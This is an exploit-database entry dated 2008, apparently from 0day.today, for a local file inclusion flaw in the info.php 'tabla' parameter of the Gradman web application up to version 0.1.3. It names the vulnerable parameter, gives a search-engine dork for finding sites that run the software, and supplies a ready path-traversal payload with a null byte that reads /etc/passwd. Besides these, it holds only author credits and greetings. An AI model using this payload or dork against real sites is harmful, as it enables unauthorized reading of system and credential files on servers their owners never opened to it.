id: 2515
date: 01/18/2008
title: Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability
author: Syndr0me
cves: 

====================================================================
Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability
====================================================================



Software: Gradman <= 0.1.3
HomePage: http://gradman.xe1ido.com.mx/
Software: Gradman <= 0.1.3
Exploit:  Local File Inclusion [High]
Dork:    "powered by Gradman"
Bug Found By: Syndr0me! site: www.remoteexecution.es
Where: info.php?tabla=
Greetz: S4nt0!, Yubix, Xarnuz, Chame, Electr0cbax, komtec1, f34r
[+] Exploit:
info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-27]  #